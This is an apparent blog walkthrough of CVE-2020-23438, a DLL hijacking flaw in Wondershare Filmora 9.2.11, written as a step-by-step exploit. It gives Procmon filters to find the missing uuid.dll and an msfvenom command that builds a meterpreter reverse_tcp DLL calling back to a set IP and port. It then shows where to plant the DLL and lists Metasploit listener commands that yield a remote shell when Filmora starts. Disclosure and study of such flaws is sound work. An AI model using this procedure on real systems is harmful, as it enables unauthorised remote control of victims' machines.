CVEWalkthrough

CVE-2020-23438: Wondershare Filmora 9.2.11 – Trojan DLL Hijacking Leading to Privilege Escalation

No Comments on CVE-2020-23438: Wondershare Filmora 9.2.11 – Trojan DLL Hijacking Leading to Privilege EscalationUncategorized tp9222@gmail.com

Vulnerable Software: Wondershare Filmora

Vulnerability: Trojan DLL Hijacking

Affected Version: Up to 9.2.11

Fixed Version: No Fix Available

Vendor Homepage: Link

CVE: CVE-2020-23438

CVE Author: Tejas Nitin Pingulkar

Exploit Available: POC

Vulnerability Overview

Wondershare Filmora 9.2.11 is vulnerable to DLL hijacking, allowing an attacker with local access to execute arbitrary code by placing a malicious DLL (uuid.dll) in a specific user-writable directory.

The application incorrectly searches for DLLs in multiple locations, including:
C:\Users\<username>\AppData\Local\Microsoft\WindowsApps

An attacker can craft a malicious DLL and place it in this directory. When Wondershare Filmora is launched, it loads the malicious DLL, executing the attacker’s code with elevated privileges.

Exploit

1. Identifying the Vulnerable DLL Load Path

Use Process Monitor (Procmon) to identify missing DLLs loaded by Filmora.

Steps:

1. Identifying the Vulnerable DLL Load Path

  1. Run Process Monitor (Procmon.exe).
  2. Apply Filters:
    • Process Name is Filmora.exe → Add
    • Path contains .dll → Add
    • Result is NAME NOT FOUND → Apply
  3. Run Wondershare Filmora and analyze logs.
  4. Confirm that Filmora attempts to load uuid.dll from: “Path: C:\Users\<username>\AppData\Local\Microsoft\WindowsApps”
2. Creating the Malicious DLL
  1. Generate a malicious DLL using msfvenom: sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.33.128 LPORT=8888 -f dll -o uuid.dll

3. Placing the Malicious DLL in the Vulnerable Directory

  1. Once uuid.dll is created, place it in the vulnerable path: C:\Users\<username>\AppData\Local\Microsoft\WindowsApps

4. Setting Up a Metasploit Listener

  1. msfconsole
  2. use exploit/multi/handler
  3. set payload windows/meterpreter/reverse_tcp
  4. set LHOST [ATTACKER IP ADDRESS]
  5. set LPORT [PORT NUMBER]
  6. exploit

5. Triggering the Exploit

  1. Launch Wondershare Filmora.
  2. Filmora attempts to load uuid.dll from C:\Users\<username>\AppData\Local\Microsoft\WindowsApps.
  3. Our malicious DLL executes, establishing a reverse shell back to the attacker’s machine.
  4. Meterpreter session is opened in Metasploit, allowing full remote control.

POC:

Identifying the Vulnerable DLL Load Path
Creating the Malicious DLL
Setting Up a Metasploit Listener
Placing the Malicious DLL in the Vulnerable Directory
Triggering the Exploit
Meterpreter session is opened in Metasploit, allowing full remote control
CVE-2020-23438: Wondershare Filmora 9.2.11 – Trojan DLL Hijacking Leading to Privilege Escalation

Leave a Reply

Your email address will not be published. Required fields are marked *

Scroll to top